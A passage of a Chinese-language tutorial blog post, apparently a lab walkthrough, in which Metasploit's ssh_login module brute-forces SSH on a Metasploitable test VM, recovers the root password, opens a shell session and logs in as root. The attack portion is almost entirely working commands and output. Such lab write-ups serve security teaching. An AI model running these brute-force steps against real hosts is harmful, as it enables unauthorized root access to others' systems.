msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file root_userpass.txt
pass_file => root_userpass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set userpass_file root_userpass.txt
userpass_file => root_userpass.txt
在終端中輸入“set THREADS 50”,設定暴力破解的執行緒數為50,
msf6 auxiliary(scanner/ssh/ssh_login) > set threads 50
threads => 50
在終端中輸入“run”, 開始向目標主機爆破ssh的登陸帳號和密碼,登陸帳號為root,密碼為gzt041057,
msf6 auxiliary(scanner/ssh/ssh_login) > run
[+] 192.168.22.134:22 - Success: 'root:gzt041057' 'uid=0(root) gid=0(root) groups=0(root) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 3 opened (192.168.22.137:45913 -> 192.168.22.134:22) at 2021-02-06 13:52:04 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
在終端中輸入“ssh root@192.168.22.134”,連接目標主機,
msf6 auxiliary(scanner/ssh/ssh_login) > ssh root@192.168.22.134
[*] exec: ssh root@192.168.22.134
The authenticity of host '192.168.22.134 (192.168.22.134)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.22.134' (RSA) to the list of known hosts.
root@192.168.22.134's password:
Last login: Fri Feb 5 23:51:57 2021 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~#
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/257397.html
標籤:其他
上一篇:全域變數
下一篇:解決Fiddler不能抓包問題